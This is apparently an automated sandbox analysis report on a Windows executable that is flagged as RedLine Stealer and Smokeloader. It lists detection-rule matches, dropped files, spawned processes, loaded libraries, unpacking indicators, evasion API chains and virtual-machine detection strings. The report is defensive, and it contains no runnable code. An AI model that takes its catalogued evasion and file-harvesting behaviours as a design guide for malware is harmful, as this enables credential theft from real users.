                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: VAIIBIHmtT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 81C9.tmp.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/7@1/3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00402B10 SetLastError,SetLastError,DefineDosDeviceW,_malloc,EnumResourceNamesW,CoSuspendClassObjects,WinHttpOpen,GetDiskFreeSpaceW,OpenJobObjectW,InterlockedDecrement,_ldexp,VirtualAlloc,GetTickCount,GetTickCount,LoadLibraryA,ReadConsoleInputA,InterlockedExchange,LoadLibraryA,ReadConsoleInputA,LCMapStringW,OpenEventW,LCMapStringW,InterlockedExchange,OpenEventW,GetCurrentProcess,GetCharWidth32A,GetCurrentProcess,GetCharWidth32A,GetLastError,GetLastError,GetFileAttributesA,GetShortPathNameA,GlobalCompact,GetFileAttributesA,GetShortPathNameA,GlobalCompact,FreeEnvironmentStringsA,SetComputerNameW,InterlockedExchange
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_005F07A6 CreateToolhelp32Snapshot,Module32First
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Mutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | File created: C:\Users\user\AppData\Local\Temp\81C9.tmp
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: {F?= | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: K(5 | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: .XFJ | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: E*O< | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: !,j. | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: \d4& | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Command line argument: 0B | 0_2_00402DE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: VAIIBIHmtT.exe | ReversingLabs: Detection: 50%
                    Source: unknown | Process created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Process created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Process created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: msimg32.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: pcacli.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeUnpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeUnpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeUnpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeUnpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00408BC5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00408BC5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00405359 push ecx; ret 0_2_0040536C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F363B push 00000003h; ret 0_2_005F363F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F5C3A pushad ; ret 0_2_005F5C56
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F1ABE push ebx; retf 0_2_005F1AC5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F1F53 push edx; retn 0010h0_2_005F1F55
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F5DB9 push ecx; ret 0_2_005F5DD6
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F31AE pushad ; ret 0_2_005F31BD
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007780F8 push esp; retf 0_2_00778100
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00751126 push ecx; ret 0_2_00751139
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007786F6 push esp; retf 0_2_007786F7
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00750751 push ecx; ret 0_2_00750764
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00410786 push ecx; ret 1_2_00410799
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 1_2_0043DB9B
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040FDB1 push ecx; ret 1_2_0040FDC4
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0041B035 push ecx; ret 2_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040020D pushfd ; iretd 2_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_008005A3 push eax; ret 2_2_008005C1
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_008005B2 push eax; ret 2_2_008005C1
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_007FD5D3 push 7DD07DC0h; iretd 2_2_007FD5E4
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_007FCACD pushfd ; iretd 2_2_007FCAD0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B3B29C push ecx; ret 2_2_00B3B2AF
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B20F59 pushfd ; iretd 2_2_00B21078
                    Source: VAIIBIHmtT.exeStatic PE information: section name: .text entropy: 7.267782607208231
                    Source: ScreenUpdateSync[1].exe.1.drStatic PE information: section name: .text entropy: 7.493472251285573
                    Source: 81C9.tmp.exe.1.drStatic PE information: section name: .text entropy: 7.493472251285573
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0040E999
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_2-26293
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Window / User API: threadDelayed 970
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Window / User API: threadDelayed 9019
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Evaded block: after key decision | graph_2-27454
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_1-32394
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_0-36582
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | API coverage: 8.3 %
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API coverage: 6.4 %
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440 | Thread sleep count: 970 > 30
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440 | Thread sleep time: -689670s >= -30000s
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440 | Thread sleep count: 9019 > 30
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440 | Thread sleep time: -6412509s >= -30000s
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 2_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 2_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA | 2_2_00414570
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00414910
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 2_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose | 2_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_00B2DCE7
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 2_2_00B2C0D7
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00B2E077
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00B21937
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00B2F917
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 2_2_00B34107
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 2_2_00B2E697
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 2_2_00B2EF87
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 2_2_00B347D7
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 2_2_00B33B17
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00B34B77
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus | 0_2_004027D0
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00401160 GetSystemInfo,ExitProcess | 2_2_00401160
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.000000000075F000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
